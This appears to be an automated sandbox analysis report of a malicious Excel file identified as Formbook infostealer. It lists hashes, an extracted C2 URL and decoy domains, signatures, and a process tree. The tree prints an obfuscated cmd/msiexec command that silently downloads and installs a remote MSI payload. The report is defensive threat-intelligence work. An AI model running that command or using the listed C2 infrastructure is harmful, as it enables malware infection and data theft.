Overview

overview

10

Static

static

8

814e1a31a6...fc.xls

windows7_x64

10

814e1a31a6...fc.xls

windows10_x64

10

Analysis

  • max time kernel
    149s
  • max time network
    136s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    07-05-2021 11:40

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    814e1a31a6bff8df45a6393430e9c0b7bbaddafc.xls

  • Size

    37KB

  • MD5

    ccaacde2a2fea467aacb4d46c0f6d92a

  • SHA1

    814e1a31a6bff8df45a6393430e9c0b7bbaddafc

  • SHA256

    c2c6534ff0fbb2099535e54323aec998d82de2811f6fd82337927c9d866e01f4

  • SHA512

    6592b22bb684fa3a47f33f666c6a3af666b59052adbce1088dfa9031b1f862328ba3d533f03abd3e47fe34d5d05db2873feeec8dae7d08c23bc88cb51b4c19ee

Score
10/10
formbookratspywarestealertrojan

Malware Config

Extracted

Family

formbook

Version

4.1

C2

http://www.111bjs.com/ccr/

Decoy

abdullahlodhi.com

jevya.com

knoxvillerestaurant.com

mekarauroko7389.com

cricketspowder.net

johannchirinos.com

orangeorganical.com

libero-tt.com

lorenaegianluca.com

wintab.net

modernmillievintage.com

zgdqcyw.com

jeffabildgaardmd.com

nurulfikrimakassar.com

findyourchef.com

innovationsservicegroup.com

destek-taleplerimiz.com

whfqqco.icu

kosmetikmadeingermany.com

dieteticos.net

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

    trojanspywarestealerformbook
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Formbook Payload 2 IoCs
    rat
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Use of msiexec (install) with remote resource 1 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • NSIS installer 6 IoCs
    installer
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 50 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1204
    • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\814e1a31a6bff8df45a6393430e9c0b7bbaddafc.xls
      2⤵
      • Enumerates system info in registry
      • Modifies Internet Explorer settings
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:736
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C m^SiE^x^e^c /i http://farm-finn.com/admin/556791.msi /qn
        3⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:1220
        • C:\Windows\SysWOW64\msiexec.exe
          mSiExec /i http://farm-finn.com/admin/556791.msi /qn
          4⤵
          • Use of msiexec (install) with remote resource
          • Suspicious use of AdjustPrivilegeToken
          PID:1420
    • C:\Windows\SysWOW64\autoconv.exe
      "C:\Windows\SysWOW64\autoconv.exe"
      2⤵
        PID:1524
      • C:\Windows\SysWOW64\cmstp.exe
        "C:\Windows\SysWOW64\cmstp.exe"
        2⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1688
        • C:\Windows\SysWOW64\cmd.exe
          /c del "C:\Windows\Installer\MSIABFB.tmp"
          3⤵
            PID:1168
      • C:\Windows\system32\msiexec.exe
        C:\Windows\system32\msiexec.exe /V
        1⤵
        • Blocklisted process makes network request
        • Enumerates connected drives
        • Drops file in Windows directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1640
        • C:\Windows\Installer\MSIABFB.tmp
          "C:\Windows\Installer\MSIABFB.tmp"
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:908
          • C:\Windows\Installer\MSIABFB.tmp
            "C:\Windows\Installer\MSIABFB.tmp"
            3⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            PID:1544

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Windows\Installer\MSIABFB.tmp
        MD5

        2b1cb416ade4d567beae5b90f78881a6

        SHA1

        bb6cfc2f205a922620eeca38406e9ca2ff2875bf

        SHA256

        ac2bc57ced40d79ee9507ee3259682c9a545a1290c2dbd4e0a5045b1ae5e61f3

        SHA512

        f96dc90e2ef21cb6ce5334d4b3b1043b51862fb9686afdc41da95188d653f6f69d013b62c9301425b95f16e259a4d672e39418c8a849dd5b9b98e20a18853a09

        Download Submit

      • C:\Windows\Installer\MSIABFB.tmp
        MD5

        2b1cb416ade4d567beae5b90f78881a6

        SHA1

        bb6cfc2f205a922620eeca38406e9ca2ff2875bf

        SHA256

        ac2bc57ced40d79ee9507ee3259682c9a545a1290c2dbd4e0a5045b1ae5e61f3

        SHA512

        f96dc90e2ef21cb6ce5334d4b3b1043b51862fb9686afdc41da95188d653f6f69d013b62c9301425b95f16e259a4d672e39418c8a849dd5b9b98e20a18853a09

        Download Submit

      • C:\Windows\Installer\MSIABFB.tmp
        MD5

        2b1cb416ade4d567beae5b90f78881a6

        SHA1

        bb6cfc2f205a922620eeca38406e9ca2ff2875bf

        SHA256

        ac2bc57ced40d79ee9507ee3259682c9a545a1290c2dbd4e0a5045b1ae5e61f3

        SHA512

        f96dc90e2ef21cb6ce5334d4b3b1043b51862fb9686afdc41da95188d653f6f69d013b62c9301425b95f16e259a4d672e39418c8a849dd5b9b98e20a18853a09

        Download Submit

      • \Users\Admin\AppData\Local\Temp\nsnACC4.tmp\ie2mi.dll
        MD5

        7795b5a3842f3220526b9b5c0792c91a

        SHA1

        69d6e1a264aab15d749a70a74d63de59c266e3b4

        SHA256

        7d931a93e761686bde7d6a79253cb03378ee28f8d12c683a9017540e798d2988

        SHA512

        45bf7270aee9e4ccbd84107490469e455ac4bc6faac7e1aff9cc4453c9c07afc8e64dbef955e248116d28f49b51f6596812d8366ed057ddc73ab061aecfcc43e

        Download Submit

      • memory/736-60-0x000000002FAC1000-0x000000002FAC4000-memory.dmp

        Filesize

        12KB

        Download

      • memory/736-62-0x000000005FFF0000-0x0000000060000000-memory.dmp

        Filesize

        64KB

        Download

      • memory/736-61-0x00000000716A1000-0x00000000716A3000-memory.dmp

        Filesize

        8KB

        Download

      • memory/908-67-0x0000000000000000-mapping.dmp

        Download

      • memory/908-74-0x00000000007D0000-0x00000000007D2000-memory.dmp

        Filesize

        8KB

        Download

      • memory/1168-83-0x0000000000000000-mapping.dmp

        Download

      • memory/1204-78-0x00000000041D0000-0x00000000042DB000-memory.dmp

        Filesize

        1.0MB

        Download

      • memory/1204-86-0x0000000004B00000-0x0000000004BBD000-memory.dmp

        Filesize

        756KB

        Download

      • memory/1220-63-0x0000000000000000-mapping.dmp

        Download

      • memory/1420-64-0x0000000000000000-mapping.dmp

        Download

      • memory/1420-65-0x0000000075891000-0x0000000075893000-memory.dmp

        Filesize

        8KB

        Download

      • memory/1544-72-0x000000000041EBB0-mapping.dmp

        Download

      • memory/1544-76-0x0000000000890000-0x0000000000B93000-memory.dmp

        Filesize

        3.0MB

        Download

      • memory/1544-77-0x0000000000340000-0x0000000000354000-memory.dmp

        Filesize

        80KB

        Download

      • memory/1544-75-0x0000000000400000-0x000000000042E000-memory.dmp

        Filesize

        184KB

        Download

      • memory/1640-66-0x000007FEFBEA1000-0x000007FEFBEA3000-memory.dmp

        Filesize

        8KB

        Download

      • memory/1688-82-0x00000000000F0000-0x000000000011E000-memory.dmp

        Filesize

        184KB

        Download

      • memory/1688-81-0x0000000000770000-0x0000000000788000-memory.dmp

        Filesize

        96KB

        Download

      • memory/1688-84-0x0000000002040000-0x0000000002343000-memory.dmp

        Filesize

        3.0MB

        Download

      • memory/1688-85-0x0000000000550000-0x00000000005E3000-memory.dmp

        Filesize

        588KB

        Download

      • memory/1688-79-0x0000000000000000-mapping.dmp

        Download